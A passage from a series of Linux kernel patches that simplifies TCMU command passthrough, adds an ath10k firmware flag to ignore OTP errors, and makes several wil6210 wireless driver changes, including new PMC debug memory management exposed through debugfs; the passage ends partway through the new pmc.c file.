IO-related +commands are presented to userspace, and the rest are handled by LIO's +in-kernel command emulation. The commands presented are all versions +of: READ WRITE diff --git a/drivers/target/target_core_user.c b/drivers/target/target_core_user.c index dbc872a6c981..0e0feeaec39c 100644 --- a/drivers/target/target_core_user.c +++ b/drivers/target/target_core_user.c @@ -71,13 +71,6 @@ struct tcmu_hba { u32 host_id; }; -/* User wants all cmds or just some */ -enum passthru_level { - TCMU_PASS_ALL = 0, - TCMU_PASS_IO, - TCMU_PASS_INVALID, -}; - #define TCMU_CONFIG_LEN 256 struct tcmu_dev { @@ -89,7 +82,6 @@ struct tcmu_dev { #define TCMU_DEV_BIT_OPEN 0 #define TCMU_DEV_BIT_BROKEN 1 unsigned long flags; - enum passthru_level pass_level; struct uio_info uio_info; @@ -683,8 +675,6 @@ static struct se_device *tcmu_alloc_device(struct se_hba *hba, const char *name) setup_timer(&udev->timeout, tcmu_device_timedout, (unsigned long)udev); - udev->pass_level = TCMU_PASS_ALL; - return &udev->se_dev; } @@ -948,13 +938,12 @@ static void tcmu_free_device(struct se_device *dev) } enum { - Opt_dev_config, Opt_dev_size, Opt_err, Opt_pass_level, + Opt_dev_config, Opt_dev_size, Opt_err, }; static match_table_t tokens = { {Opt_dev_config, "dev_config=%s"}, {Opt_dev_size, "dev_size=%u"}, - {Opt_pass_level, "pass_level=%u"}, {Opt_err, NULL} }; @@ -965,7 +954,6 @@ static ssize_t tcmu_set_configfs_dev_params(struct se_device *dev, char *orig, *ptr, *opts, *arg_p; substring_t args[MAX_OPT_ARGS]; int ret = 0, token; - int arg; opts = kstrdup(page, GFP_KERNEL); if (!opts) @@ -998,16 +986,6 @@ static ssize_t tcmu_set_configfs_dev_params(struct se_device *dev, if (ret < 0) pr_err("kstrtoul() failed for dev_size=\n"); break; - case Opt_pass_level: - match_int(args, &arg); - if (arg >= TCMU_PASS_INVALID) { - pr_warn("TCMU: Invalid pass_level: %d\n", arg); - break; - } - - pr_debug("TCMU: Setting pass_level to %d\n", arg); - udev->pass_level = arg; - break; default: break; } @@ -1024,8 +1002,7 @@ static ssize_t tcmu_show_configfs_dev_params(struct se_device *dev, char *b) bl = sprintf(b + bl, 
"Config: %s ", udev->dev_config[0] ? udev->dev_config : "NULL"); - bl += sprintf(b + bl, "Size: %zu PassLevel: %u\n", - udev->dev_size, udev->pass_level); + bl += sprintf(b + bl, "Size: %zu\n", udev->dev_size); return bl; } @@ -1074,46 +1051,7 @@ static struct sbc_ops tcmu_sbc_ops = { static sense_reason_t tcmu_parse_cdb(struct se_cmd *cmd) { - unsigned char *cdb = cmd->t_task_cdb; - struct tcmu_dev *udev = TCMU_DEV(cmd->se_dev); - sense_reason_t ret; - - switch (udev->pass_level) { - case TCMU_PASS_ALL: - /* We're just like pscsi, then */ - /* - * For REPORT LUNS we always need to emulate the response, for everything - * else, pass it up. - */ - switch (cdb[0]) { - case REPORT_LUNS: - cmd->execute_cmd = spc_emulate_report_luns; - break; - case READ_6: - case READ_10: - case READ_12: - case READ_16: - case WRITE_6: - case WRITE_10: - case WRITE_12: - case WRITE_16: - case WRITE_VERIFY: - cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; - /* FALLTHROUGH */ - default: - cmd->execute_cmd = tcmu_pass_op; - } - ret = TCM_NO_SENSE; - break; - case TCMU_PASS_IO: - ret = sbc_parse_cdb(cmd, &tcmu_sbc_ops); - break; - default: - pr_err("Unknown tcm-user pass level %d\n", udev->pass_level); - ret = TCM_CHECK_CONDITION_ABORT_CMD; - } - - return ret; + return sbc_parse_cdb(cmd, &tcmu_sbc_ops); } DEF_TB_DEFAULT_ATTRIBS(tcmu); From d915354675a3baae834c9aae845bbb7a0fcd453d Mon Sep 17 00:00:00 2001 From: Kalle Valo Date: Tue, 28 Apr 2015 20:19:30 +0300 Subject: [PATCH 014/872] ath10k: add ATH10K_FW_FEATURE_IGNORE_OTP_RESULT qca6174 otp binary seems to always return an error to the host, even if the calibration succeeded. Add a firmware feature flag to detect if the firmware image which have this problem and workaround the issue in ath10k by ignoring the error code. I was also considering making this hw specific flag but as this is strictly a firmware issue it's best to handle this via a firmware feature flag so that it will be easy to disable the workaround. Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath10k/core.c | 4 +++- drivers/net/wireless/ath/ath10k/core.h | 3 +++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/ath/ath10k/core.c b/drivers/net/wireless/ath/ath10k/core.c index 987b266278a8..bcccae19325d 100644 --- a/drivers/net/wireless/ath/ath10k/core.c +++ b/drivers/net/wireless/ath/ath10k/core.c @@ -387,7 +387,9 @@ static int ath10k_download_and_run_otp(struct ath10k *ar) ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot otp execute result %d\n", result); - if (!skip_otp && result != 0) { + if (!(skip_otp || test_bit(ATH10K_FW_FEATURE_IGNORE_OTP_RESULT, + ar->fw_features)) + && result != 0) { ath10k_err(ar, "otp calibration failed: %d", result); return -EINVAL; } diff --git a/drivers/net/wireless/ath/ath10k/core.h b/drivers/net/wireless/ath/ath10k/core.h index 8444adf42195..827b3d79ed0c 100644 --- a/drivers/net/wireless/ath/ath10k/core.h +++ b/drivers/net/wireless/ath/ath10k/core.h @@ -460,6 +460,9 @@ enum ath10k_fw_features { */ ATH10K_FW_FEATURE_WOWLAN_SUPPORT = 6, + /* Don't trust error code from otp.bin */ + ATH10K_FW_FEATURE_IGNORE_OTP_RESULT, + /* keep last */ ATH10K_FW_FEATURE_COUNT, }; From a54a40dae67e4ee04df4dc36e7b89639131dd8e3 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Thu, 30 Apr 2015 16:25:05 +0300 Subject: [PATCH 015/872] wil6210: increase timeout for the "echo" command Sometimes it takes for the firmware more than 20ms to react on "echo" command after reset. 
Increase timeout from 20 to 50ms Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/wmi.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/ath/wil6210/wmi.c b/drivers/net/wireless/ath/wil6210/wmi.c index 9fe2085be2c5..04fad5f4bbea 100644 --- a/drivers/net/wireless/ath/wil6210/wmi.c +++ b/drivers/net/wireless/ath/wil6210/wmi.c @@ -844,7 +844,7 @@ int wmi_echo(struct wil6210_priv *wil) }; return wmi_call(wil, WMI_ECHO_CMDID, &cmd, sizeof(cmd), - WMI_ECHO_RSP_EVENTID, NULL, 0, 20); + WMI_ECHO_RSP_EVENTID, NULL, 0, 50); } int wmi_set_mac_address(struct wil6210_priv *wil, void *addr) From 48c963af7432f974348d9a006914dbaf5e7c7140 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Thu, 30 Apr 2015 16:25:06 +0300 Subject: [PATCH 016/872] wil6210: update Rx descriptor fields Rx descriptor fields accordingly to the updated hardware documentation Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/txrx.c | 2 +- drivers/net/wireless/ath/wil6210/txrx.h | 24 ++++++++++++++++-------- 2 files changed, 17 insertions(+), 9 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/txrx.c b/drivers/net/wireless/ath/wil6210/txrx.c index e8bd512d81a9..1fd34e5e9824 100644 --- a/drivers/net/wireless/ath/wil6210/txrx.c +++ b/drivers/net/wireless/ath/wil6210/txrx.c @@ -236,7 +236,7 @@ static int wil_vring_alloc_skb(struct wil6210_priv *wil, struct vring *vring, return -ENOMEM; } - d->dma.d0 = BIT(9) | RX_DMA_D0_CMD_DMA_IT; + d->dma.d0 = RX_DMA_D0_CMD_DMA_RT | RX_DMA_D0_CMD_DMA_IT; wil_desc_addr_set(&d->dma.addr, pa); /* ip_length don't care */ /* b11 don't care */ diff --git a/drivers/net/wireless/ath/wil6210/txrx.h b/drivers/net/wireless/ath/wil6210/txrx.h index d90c8aa20c15..0c4638487c74 100644 --- a/drivers/net/wireless/ath/wil6210/txrx.h +++ b/drivers/net/wireless/ath/wil6210/txrx.h @@ -384,19 +384,27 @@ struct vring_rx_mac { * [word 7] length */ -#define RX_DMA_D0_CMD_DMA_IT BIT(10) - -/* Error field, offload bits */ -#define RX_DMA_ERROR_L3_ERR BIT(4) -#define RX_DMA_ERROR_L4_ERR BIT(5) +#define RX_DMA_D0_CMD_DMA_EOP BIT(8) +#define RX_DMA_D0_CMD_DMA_RT BIT(9) /* always 1 */ +#define RX_DMA_D0_CMD_DMA_IT BIT(10) /* interrupt */ + +/* Error field */ +#define RX_DMA_ERROR_FCS BIT(0) +#define RX_DMA_ERROR_MIC BIT(1) +#define RX_DMA_ERROR_KEY BIT(2) /* Key missing */ +#define RX_DMA_ERROR_REPLAY BIT(3) +#define RX_DMA_ERROR_L3_ERR BIT(4) +#define RX_DMA_ERROR_L4_ERR BIT(5) /* Status field */ -#define RX_DMA_STATUS_DU BIT(0) -#define RX_DMA_STATUS_ERROR BIT(2) - +#define RX_DMA_STATUS_DU BIT(0) +#define RX_DMA_STATUS_EOP BIT(1) +#define RX_DMA_STATUS_ERROR BIT(2) +#define RX_DMA_STATUS_MI BIT(3) /* MAC Interrupt is asserted */ #define RX_DMA_STATUS_L3I BIT(4) #define RX_DMA_STATUS_L4I BIT(5) #define RX_DMA_STATUS_PHY_INFO BIT(6) +#define RX_DMA_STATUS_FFM BIT(7) /* EtherType Flex Filter Match */ struct vring_rx_dma { u32 d0; From bb6c8dccfe2302a97d8edd4ba5e6234a8fd3c626 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Thu, 30 Apr 2015 16:25:07 +0300 Subject: [PATCH 017/872] wil6210: fix boot loader "ready" indication Boot loader "ready" indication has changed from "bit0 set" to "only bit0 set". This is to address hardware glitches. Due to glitches, sometimes right after reset register reads 0xffffffff, or (rarely) other garbage. 
Reflect this in the driver Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/main.c | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/main.c b/drivers/net/wireless/ath/wil6210/main.c index 0623d8c98956..146fd8088fde 100644 --- a/drivers/net/wireless/ath/wil6210/main.c +++ b/drivers/net/wireless/ath/wil6210/main.c @@ -551,7 +551,7 @@ static inline void wil_release_cpu(struct wil6210_priv *wil) static int wil_target_reset(struct wil6210_priv *wil) { int delay = 0; - u32 x; + u32 x, x1 = 0; wil_dbg_misc(wil, "Resetting \"%s\"...\n", wil->hw_name); @@ -606,12 +606,16 @@ static int wil_target_reset(struct wil6210_priv *wil) do { msleep(RST_DELAY); x = R(RGF_USER_BL + offsetof(struct RGF_BL, ready)); + if (x1 != x) { + wil_dbg_misc(wil, "BL.ready 0x%08x => 0x%08x\n", x1, x); + x1 = x; + } if (delay++ > RST_COUNT) { wil_err(wil, "Reset not completed, bl.ready 0x%08x\n", x); return -ETIME; } - } while (!(x & BIT_BL_READY)); + } while (x != BIT_BL_READY); C(RGF_USER_CLKS_CTL_0, BIT_USER_CLKS_RST_PWGD); From 1e7e5a0d318229b5ad12efeee690b8d0d5c980ff Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Thu, 30 Apr 2015 16:25:08 +0300 Subject: [PATCH 018/872] wil6210: fix for probe_resp IE's Parameters for the start_ap and change_bcon contains probe response template and probe response IE's. supplicant puts in the proberesp_ies only WPS related IE's, while firmware need all IE's, most notable is RSN that is not included in the proberesp_ies. Always use IE's provided by the bcon->probe_resp Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/cfg80211.c | 31 ++++++++++++++------- 1 file changed, 21 insertions(+), 10 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/cfg80211.c b/drivers/net/wireless/ath/wil6210/cfg80211.c index ea331e407e7f..f53a1908fae2 100644 --- a/drivers/net/wireless/ath/wil6210/cfg80211.c +++ b/drivers/net/wireless/ath/wil6210/cfg80211.c @@ -669,11 +669,6 @@ static int wil_fix_bcon(struct wil6210_priv *wil, if (bcon->probe_resp_len <= hlen) return 0; - if (!bcon->proberesp_ies) { - bcon->proberesp_ies = f->u.probe_resp.variable; - bcon->proberesp_ies_len = bcon->probe_resp_len - hlen; - rc = 1; - } if (!bcon->assocresp_ies) { bcon->assocresp_ies = f->u.probe_resp.variable; bcon->assocresp_ies_len = bcon->probe_resp_len - hlen; @@ -688,9 +683,19 @@ static int wil_cfg80211_change_beacon(struct wiphy *wiphy, struct cfg80211_beacon_data *bcon) { struct wil6210_priv *wil = wiphy_to_wil(wiphy); + struct ieee80211_mgmt *f = (struct ieee80211_mgmt *)bcon->probe_resp; + size_t hlen = offsetof(struct ieee80211_mgmt, u.probe_resp.variable); + const u8 *pr_ies = NULL; + size_t pr_ies_len = 0; int rc; wil_dbg_misc(wil, "%s()\n", __func__); + wil_print_bcon_data(bcon); + + if (bcon->probe_resp_len > hlen) { + pr_ies = f->u.probe_resp.variable; + pr_ies_len = bcon->probe_resp_len - hlen; + } if (wil_fix_bcon(wil, bcon)) { wil_dbg_misc(wil, "Fixed bcon\n"); @@ -703,9 +708,7 @@ static int wil_cfg80211_change_beacon(struct wiphy *wiphy, * wmi_set_ie(wil, WMI_FRAME_BEACON, bcon->beacon_ies_len, * bcon->beacon_ies); */ - rc = wmi_set_ie(wil, WMI_FRAME_PROBE_RESP, - bcon->proberesp_ies_len, - bcon->proberesp_ies); + rc = wmi_set_ie(wil, WMI_FRAME_PROBE_RESP, pr_ies_len, pr_ies); if (rc) { wil_err(wil, "set_ie(PROBE_RESP) failed\n"); return rc; @@ -733,6 +736,10 @@ static int wil_cfg80211_start_ap(struct wiphy *wiphy, struct 
cfg80211_beacon_data *bcon = &info->beacon; struct cfg80211_crypto_settings *crypto = &info->crypto; u8 wmi_nettype = wil_iftype_nl2wmi(wdev->iftype); + struct ieee80211_mgmt *f = (struct ieee80211_mgmt *)bcon->probe_resp; + size_t hlen = offsetof(struct ieee80211_mgmt, u.probe_resp.variable); + const u8 *pr_ies = NULL; + size_t pr_ies_len = 0; wil_dbg_misc(wil, "%s()\n", __func__); @@ -752,6 +759,11 @@ static int wil_cfg80211_start_ap(struct wiphy *wiphy, wil_print_bcon_data(bcon); wil_print_crypto(wil, crypto); + if (bcon->probe_resp_len > hlen) { + pr_ies = f->u.probe_resp.variable; + pr_ies_len = bcon->probe_resp_len - hlen; + } + if (wil_fix_bcon(wil, bcon)) { wil_dbg_misc(wil, "Fixed bcon\n"); wil_print_bcon_data(bcon); @@ -779,8 +791,7 @@ static int wil_cfg80211_start_ap(struct wiphy *wiphy, * wmi_set_ie(wil, WMI_FRAME_BEACON, bcon->beacon_ies_len, * bcon->beacon_ies); */ - wmi_set_ie(wil, WMI_FRAME_PROBE_RESP, bcon->proberesp_ies_len, - bcon->proberesp_ies); + wmi_set_ie(wil, WMI_FRAME_PROBE_RESP, pr_ies_len, pr_ies); wmi_set_ie(wil, WMI_FRAME_ASSOC_RESP, bcon->assocresp_ies_len, bcon->assocresp_ies); From dc16427bbe65aeec416f490df73cdeeef5ab62c0 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Thu, 30 Apr 2015 16:25:09 +0300 Subject: [PATCH 019/872] wil6210: Add pmc debug mechanism memory management Pmc is a hardware debug mechanism which allows capturing phy data, packets, and internally generated events and messages synchronized and time stamped by the hardware. It requires memory buffers allocated by the driver in order to be used by hardware dma to upstream real time debug data to host memory. Driver will handle memory allocation and release, and fetching the data from the memory to application layer via debug file system. The configuration of pmc is handled entirely by the application layer. Signed-off-by: Vladimir Shulman Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/Makefile | 1 + drivers/net/wireless/ath/wil6210/debugfs.c | 93 +++++ drivers/net/wireless/ath/wil6210/pmc.c | 375 +++++++++++++++++++++ drivers/net/wireless/ath/wil6210/pmc.h | 27 ++ drivers/net/wireless/ath/wil6210/wil6210.h | 14 + drivers/net/wireless/ath/wil6210/wmi.h | 15 + 6 files changed, 525 insertions(+) create mode 100644 drivers/net/wireless/ath/wil6210/pmc.c create mode 100644 drivers/net/wireless/ath/wil6210/pmc.h diff --git a/drivers/net/wireless/ath/wil6210/Makefile b/drivers/net/wireless/ath/wil6210/Makefile index caa717bf52f3..050506f842e9 100644 --- a/drivers/net/wireless/ath/wil6210/Makefile +++ b/drivers/net/wireless/ath/wil6210/Makefile @@ -12,6 +12,7 @@ wil6210-y += debug.o wil6210-y += rx_reorder.o wil6210-y += ioctl.o wil6210-y += fw.o +wil6210-y += pmc.o wil6210-$(CONFIG_WIL6210_TRACING) += trace.o wil6210-y += wil_platform.o wil6210-y += ethtool.o diff --git a/drivers/net/wireless/ath/wil6210/debugfs.c b/drivers/net/wireless/ath/wil6210/debugfs.c index bbc22d88f78f..19f77e55dc53 100644 --- a/drivers/net/wireless/ath/wil6210/debugfs.c +++ b/drivers/net/wireless/ath/wil6210/debugfs.c @@ -24,6 +24,7 @@ #include "wil6210.h" #include "wmi.h" #include "txrx.h" +#include "pmc.h" /* Nasty hack. 
Better have per device instances */ static u32 mem_addr; @@ -702,6 +703,89 @@ static const struct file_operations fops_back = { .open = simple_open, }; +/* pmc control, write: + * - "alloc " to allocate PMC + * - "free" to release memory allocated for PMC + */ +static ssize_t wil_write_pmccfg(struct file *file, const char __user *buf, + size_t len, loff_t *ppos) +{ + struct wil6210_priv *wil = file->private_data; + int rc; + char *kbuf = kmalloc(len + 1, GFP_KERNEL); + char cmd[9]; + int num_descs, desc_size; + + if (!kbuf) + return -ENOMEM; + + rc = simple_write_to_buffer(kbuf, len, ppos, buf, len); + if (rc != len) { + kfree(kbuf); + return rc >= 0 ? -EIO : rc; + } + + kbuf[len] = '\0'; + rc = sscanf(kbuf, "%8s %d %d", cmd, &num_descs, &desc_size); + kfree(kbuf); + + if (rc < 0) + return rc; + + if (rc < 1) { + wil_err(wil, "pmccfg: no params given\n"); + return -EINVAL; + } + + if (0 == strcmp(cmd, "alloc")) { + if (rc != 3) { + wil_err(wil, "pmccfg: alloc requires 2 params\n"); + return -EINVAL; + } + wil_pmc_alloc(wil, num_descs, desc_size); + } else if (0 == strcmp(cmd, "free")) { + if (rc != 1) { + wil_err(wil, "pmccfg: free does not have any params\n"); + return -EINVAL; + } + wil_pmc_free(wil, true); + } else { + wil_err(wil, "pmccfg: Unrecognized command \"%s\"\n", cmd); + return -EINVAL; + } + + return len; +} + +static ssize_t wil_read_pmccfg(struct file *file, char __user *user_buf, + size_t count, loff_t *ppos) +{ + struct wil6210_priv *wil = file->private_data; + char text[256]; + char help[] = "pmc control, write:\n" + " - \"alloc \" to allocate pmc\n" + " - \"free\" to free memory allocated for pmc\n"; + + sprintf(text, "Last command status: %d\n\n%s", + wil_pmc_last_cmd_status(wil), + help); + + return simple_read_from_buffer(user_buf, count, ppos, text, + strlen(text) + 1); +} + +static const struct file_operations fops_pmccfg = { + .read = wil_read_pmccfg, + .write = wil_write_pmccfg, + .open = simple_open, +}; + +static const struct file_operations fops_pmcdata = { + .open = simple_open, + .read = wil_pmc_read, + .llseek = wil_pmc_llseek, +}; + /*---tx_mgmt---*/ /* Write mgmt frame to this file to send it */ static ssize_t wil_write_file_txmgmt(struct file *file, const char __user *buf, @@ -1363,6 +1447,8 @@ static const struct { {"tx_mgmt", S_IWUSR, &fops_txmgmt}, {"wmi_send", S_IWUSR, &fops_wmi}, {"back", S_IRUGO | S_IWUSR, &fops_back}, + {"pmccfg", S_IRUGO | S_IWUSR, &fops_pmccfg}, + {"pmcdata", S_IRUGO, &fops_pmcdata}, {"temp", S_IRUGO, &fops_temp}, {"freq", S_IRUGO, &fops_freq}, {"link", S_IRUGO, &fops_link}, @@ -1440,6 +1526,8 @@ int wil6210_debugfs_init(struct wil6210_priv *wil) if (IS_ERR_OR_NULL(dbg)) return -ENODEV; + wil_pmc_init(wil); + wil6210_debugfs_init_files(wil, dbg); wil6210_debugfs_init_isr(wil, dbg); wil6210_debugfs_init_blobs(wil, dbg); @@ -1459,4 +1547,9 @@ void wil6210_debugfs_remove(struct wil6210_priv *wil) { debugfs_remove_recursive(wil->debug); wil->debug = NULL; + + /* free pmc memory without sending command to fw, as it will + * be reset on the way down anyway + */ + wil_pmc_free(wil, false); } diff --git a/drivers/net/wireless/ath/wil6210/pmc.c b/drivers/net/wireless/ath/wil6210/pmc.c new file mode 100644 index 000000000000..3cb4f35ebd05 --- /dev/null +++ b/drivers/net/wireless/ath/wil6210/pmc.c @@ -0,0 +1,375 @@ +/* + * Copyright (c) 2012-2015 Qualcomm Atheros, Inc. 
+ * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +#include +#include +#include +#include "wmi.h" +#include "wil6210.h" +#include "txrx.h" +#include "pmc.h" + +struct desc_alloc_info { + dma_addr_t pa; + void *va; +}; + +static int wil_is_pmc_allocated(struct pmc_ctx *pmc) +{ + return !!pmc->pring_va; +} + +void wil_pmc_init(struct wil6210_priv *wil) +{ + memset(&wil->pmc, 0, sizeof(struct pmc_ctx)); + mutex_init(&wil->pmc.lock); +} + +/** + * Allocate the physical ring (p-ring) and the required + * number of descriptors of required size. + * Initialize the descriptors as required by pmc dma. + * The descriptors' buffers dwords are initialized to hold + * dword's serial number in the lsw and reserved value + * PCM_DATA_INVALID_DW_VAL in the msw. + */ +void wil_pmc_alloc(struct wil6210_priv *wil, + int num_descriptors, + int descriptor_size) +{ + u32 i; + struct pmc_ctx *pmc = &wil->pmc; + struct device *dev = wil_to_dev(wil); + struct wmi_pmc_cmd pmc_cmd = {0}; + + mutex_lock(&pmc->lock); + + if (wil_is_pmc_allocated(pmc)) { + /* sanity check */ + wil_err(wil, "%s: ERROR pmc is already allocated\n", __func__); + goto no_release_err; + } + + pmc->num_descriptors = num_descriptors; + pmc->descriptor_size = descriptor_size; + + wil_dbg_misc(wil, "%s: %d descriptors x %d bytes each\n", + __func__, num_descriptors, descriptor_size); + + /* allocate descriptors info list in pmc context*/ + pmc->descriptors = kcalloc(num_descriptors, + sizeof(struct desc_alloc_info), + GFP_KERNEL); + if (!pmc->descriptors) { + wil_err(wil, "%s: ERROR allocating pmc skb list\n", __func__); + goto no_release_err; + } + + wil_dbg_misc(wil, + "%s: allocated descriptors info list %p\n", + __func__, pmc->descriptors); + + /* Allocate pring buffer and descriptors. + * vring->va should be aligned on its size rounded up to power of 2 + * This is granted by the dma_alloc_coherent + */ + pmc->pring_va = dma_alloc_coherent(dev, + sizeof(struct vring_tx_desc) * num_descriptors, + &pmc->pring_pa, + GFP_KERNEL); + + wil_dbg_misc(wil, + "%s: allocated pring %p. 
%zd x %d = total %zd bytes\n", + __func__, + (void *)pmc->pring_pa, + sizeof(struct vring_tx_desc), + num_descriptors, + sizeof(struct vring_tx_desc) * num_descriptors); + + if (!pmc->pring_va) { + wil_err(wil, "%s: ERROR allocating pmc pring\n", __func__); + goto release_pmc_skb_list; + } + + /* initially, all descriptors are SW owned + * For Tx, Rx, and PMC, ownership bit is at the same location, thus + * we can use any + */ + for (i = 0; i < num_descriptors; i++) { + struct vring_tx_desc *_d = &pmc->pring_va[i]; + struct vring_tx_desc dd, *d = ⅆ + int j = 0; + + pmc->descriptors[i].va = dma_alloc_coherent(dev, + descriptor_size, + &pmc->descriptors[i].pa, + GFP_KERNEL); + + if (unlikely(!pmc->descriptors[i].va)) { + wil_err(wil, + "%s: ERROR allocating pmc descriptor %d", + __func__, i); + goto release_pmc_skbs; + } + + for (j = 0; j < descriptor_size / sizeof(u32); j++) { + u32 *p = (u32 *)pmc->descriptors[i].va + j; + *p = PCM_DATA_INVALID_DW_VAL | j; + } + + /* configure dma descriptor */ + d->dma.addr.addr_low = + cpu_to_le32(lower_32_bits(pmc->descriptors[i].pa)); + d->dma.addr.addr_high = + cpu_to_le16((u16)upper_32_bits(pmc->descriptors[i].pa)); + d->dma.status = 0; /* 0 = HW_OWNED */ + d->dma.length = cpu_to_le16(descriptor_size); + d->dma.d0 = BIT(9) | RX_DMA_D0_CMD_DMA_IT; + *_d = *d; + } + + wil_dbg_misc(wil, "%s: allocated successfully\n", __func__); + + pmc_cmd.op = WMI_PMC_ALLOCATE; + pmc_cmd.ring_size = cpu_to_le16(pmc->num_descriptors); + pmc_cmd.mem_base = cpu_to_le64(pmc->pring_pa); + + wil_dbg_misc(wil, "%s: send WMI_PMC_CMD with ALLOCATE op\n", __func__); + pmc->last_cmd_status = wmi_send(wil, + WMI_PMC_CMDID, + &pmc_cmd, + sizeof(pmc_cmd)); + if (pmc->last_cmd_status) { + wil_err(wil, + "%s: WMI_PMC_CMD with ALLOCATE op failed with status %d", + __func__, pmc->last_cmd_status); + goto release_pmc_skbs; + } + + mutex_unlock(&pmc->lock); + + return; + +release_pmc_skbs: + wil_err(wil, "%s: exit on error: Releasing skbs...\n", __func__); + for (i = 0; pmc->descriptors[i].va && i < num_descriptors; i++) { + dma_free_coherent(dev, + descriptor_size, + pmc->descriptors[i].va, + pmc->descriptors[i].pa); + + pmc->descriptors[i].va = NULL; + } + wil_err(wil, "%s: exit on error: Releasing pring...\n", __func__); + + dma_free_coherent(dev, + sizeof(struct vring_tx_desc) * num_descriptors, + pmc->pring_va, + pmc->pring_pa); + + pmc->pring_va = NULL; + +release_pmc_skb_list: + wil_err(wil, "%s: exit on error: Releasing descriptors info list...\n", + __func__); + kfree(pmc->descriptors); + pmc->descriptors = NULL; + +no_release_err: + pmc->last_cmd_status = -ENOMEM; + mutex_unlock(&pmc->lock); +} + +/** + * Traverse the p-ring and release all buffers. 
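+ * If send_pmc_cmd is set, a WMI_PMC_CMDID with the RELEASE op is sent to
+ * firmware before the dma_free_coherent() calls below.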
+ * At the end release the p-ring memory + */ +void wil_pmc_free(struct wil6210_priv *wil, int send_pmc_cmd) +{ + struct pmc_ctx *pmc = &wil->pmc; + struct device *dev = wil_to_dev(wil); + struct wmi_pmc_cmd pmc_cmd = {0}; + + mutex_lock(&pmc->lock); + + pmc->last_cmd_status = 0; + + if (!wil_is_pmc_allocated(pmc)) { + wil_dbg_misc(wil, "%s: Error, can't free - not allocated\n", + __func__); + pmc->last_cmd_status = -EPERM; + mutex_unlock(&pmc->lock); + return; + } + + if (send_pmc_cmd) { + wil_dbg_misc(wil, "%s: send WMI_PMC_CMD with RELEASE op\n", + __func__); + pmc_cmd.op = WMI_PMC_RELEASE; + pmc->last_cmd_status = + wmi_send(wil, WMI_PMC_CMDID, &pmc_cmd, + sizeof(pmc_cmd)); + if (pmc->last_cmd_status) { + wil_err(wil, + "%s WMI_PMC_CMD with RELEASE op failed, status %d", + __func__, pmc->last_cmd_status); + /* There's nothing we can do with this error. + * Normally, it should never occur. + * Continue to freeing all memory allocated for pmc. + */ + } + } + + if (pmc->pring_va) { + size_t buf_size = sizeof(struct vring_tx_desc) * + pmc->num_descriptors; + + wil_dbg_misc(wil, "%s: free pring va %p\n", + __func__, pmc->pring_va); + dma_free_coherent(dev, buf_size, pmc->pring_va, pmc->pring_pa); + + pmc->pring_va = NULL; + } else { + pmc->last_cmd_status = -ENOENT; + } + + if (pmc->descriptors) { + int i; + + for (i = 0; + pmc->descriptors[i].va && i < pmc->num_descriptors; i++) { + dma_free_coherent(dev, + pmc->descriptor_size, + pmc->descriptors[i].va, + pmc->descriptors[i].pa); + pmc->descriptors[i].va = NULL; + } + wil_dbg_misc(wil, "%s: free descriptor info %d/%d\n", + __func__, i, pmc->num_descriptors); + wil_dbg_misc(wil, + "%s: free pmc descriptors info list %p\n", + __func__, pmc->descriptors); + kfree(pmc->descriptors); + pmc->descriptors = NULL; + } else { + pmc->last_cmd_status = -ENOENT; + } + + mutex_unlock(&pmc->lock); +} + +/** + * Status of the last operation requested via debugfs: alloc/free/read. + * 0 - success or negative errno + */ +int wil_pmc_last_cmd_status(struct wil6210_priv *wil) +{ + wil_dbg_misc(wil, "%s: status %d\n", __func__, + wil->pmc.last_cmd_status); + + return wil->pmc.last_cmd_status; +} + +/** + * Read from required position up to the end of current descriptor, + * depends on descriptor size configured during alloc request. 
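+ * The file position is mapped to a (descriptor index, offset within the
+ * descriptor) pair with do_div(), and the data is copied out using
+ * simple_read_from_buffer().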
